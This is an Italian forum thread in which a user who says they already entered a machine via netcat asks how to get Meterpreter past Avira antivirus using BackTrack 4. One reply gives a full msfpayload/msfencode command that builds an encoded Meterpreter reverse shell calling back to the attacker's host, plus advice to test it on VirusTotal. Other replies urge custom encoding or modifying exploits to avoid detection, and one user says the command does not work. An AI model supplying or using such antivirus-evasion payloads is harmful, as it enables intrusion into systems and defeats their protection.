Che non ti funzioni msfencode la vedo dura, fossi in te proverei a cercare qualche parola chiave su youtube e su google... ti esce una marea di roba... se poi non hai trovato nulla (ma non penso proprio) allora torna quà
Backtrack 4 vs Avira Antivir ??
Buongiorno a tutti
Vorrei chiedere se qualcuno può aiutarmi con gli strumenti in backtrack 4 a bypassare Avira Antivir perche non riesco in alcun modo, non ditemi msfencode perchè ho provato un sacco di combinazioni e non funziona, sono entrato con netcat perche non lo rileva ma non sono riuscito ad acquisire i privilegi system per disattivare l'antivirus e caricare meterpreter o altro. Sapete suggerirmi altre possibilità?
Grazie in anticipo!
Re: Backtrack 4 vs Avira Antivir ??
Che non ti funzioni msfencode la vedo dura, fossi in te proverei a cercare qualche parola chiave su youtube e su google... ti esce una marea di roba... se poi non hai trovato nulla (ma non penso proprio) allora torna quà
//Visit My Blog//
#######################################
#######################################
#######################################
#### http://hacksecurityblog.blogspot.com/ ####
#######################################
#######################################
#######################################
Re: Backtrack 4 vs Avira Antivir ??
Allora come ho detto non sono riuscito a trovare un modo per eludere Avir Antivir con gli strumenti di Backtrack 4 siccome presumo che altri abbiano tentato forse, potrebbero condividere i loro risultati, in giro sul web non ho trovato niente di buono (forse per colpa mia). Attendo gentili risposte possibilmente più utili e intelligenti dell'ultima.
Grazie a tutti in anticipo.
Riferimento: Backtrack 4 vs Avira Antivir ??
Il trucco sta nella combinazione di più encoder e nel numero di volte in cui si encoda, prova per esempio a combinare shikataganai e call4dwordxor per un pò di volte:
./msfpayload windows/meterpreter/reverse_tcp LHOST=TuoIp LPORT=4444 (di default) R | ./msfencode -e x86/shikata_ga_nai -t exe -c 50 | ./msfencode -e x86/call4_dword_xor -t raw -c 30 X > cartella di destinazione del payload
Per testarlo utilizza strumenti di scansione online come VirusTotal, così sei sicuro se va a buon fine
Spero di esserti stato d'aiuto
Re: Riferimento: Backtrack 4 vs Avira Antivir ??
Scusatemi ma voi li provate i metodi che suggerite oppure buttate giù a braccio? Quel comando che hai postato è così utile che non funziona proprio ne con l'antivirus ne senza.
Re: Backtrack 4 vs Avira Antivir ??
Alcune combinazioni di encoders non funzionano, é normale.
Se vuoi che un exploit non venga rilevato da antivirus prova a encodarlo con tecniche non standard, o modificalo tu stesso in modo che non sia riconoscibile.
Se qualcosa é troppo complesso per le tue conoscenze di adesso, cerca di ampliarle studiando il soggetto specifico per capirne il funzionamento a basso livello, e poi riprova. Non c'e' nulla di sbagliato in questo, é il modo per aumentare le proprie abilità.
Re: Backtrack 4 vs Avira Antivir ??
http://www.offensive-security.com/me...ring_EXE_Files io ti consiglio di leggere qui
Posting Permissions